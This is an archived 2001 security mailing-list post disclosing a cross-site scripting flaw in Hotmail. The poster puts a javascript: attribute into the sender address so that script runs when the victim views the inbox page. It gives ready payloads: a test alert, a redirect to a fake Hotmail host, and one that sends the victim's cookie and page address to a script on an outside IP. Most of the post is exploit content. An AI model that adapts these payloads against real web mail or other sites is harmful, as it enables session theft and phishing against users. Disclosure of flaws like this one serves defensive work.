hotmail+javascript

From: ObLiviON (v_arnhemat_private)
Date: Mon Sep 10 2001 - 08:27:55 PDT

Next message: w1re p4ir: "Achiever CSS-50 Personal Paper Shedder Buffer Overflow (Humor)"

Previous message: Enrique A. Compañ Gzz.: "TheExEcutor Class A v1.0 - Special Win32 Shellcode"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

You can bypass the hotmail javascript 'filtering' system using the
from-address.
I used netscape messenger and set my email address to
"a background=javascript:alert('test') @hotmail.com" (without quotes),
then netscape sends it as "user"@domain.

The from-address is used by hotmail as the name of the cell for the
message link etc.

--> From my hotmail inbox page:

<td name=""a background=javascript:alert('test') "@hotmail.com">

and javascript code is executed.
And its executed on the inbox page=extra fun :)
---

"a background=javascript:location.href='fake.hotmail.bla.com'
@hotmail.com"
"a
background=javascript:document.images[1].src='http://123.12.123.2/cgi-bin/bla.cgi?'+document.cookie+location.href
@hotmail.com"

etc... :)

grtz ObLiviON

Next message: w1re p4ir: "Achiever CSS-50 Personal Paper Shedder Buffer Overflow (Humor)"
Previous message: Enrique A. Compañ Gzz.: "TheExEcutor Class A v1.0 - Special Win32 Shellcode"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Sep 10 2001 - 09:37:35 PDT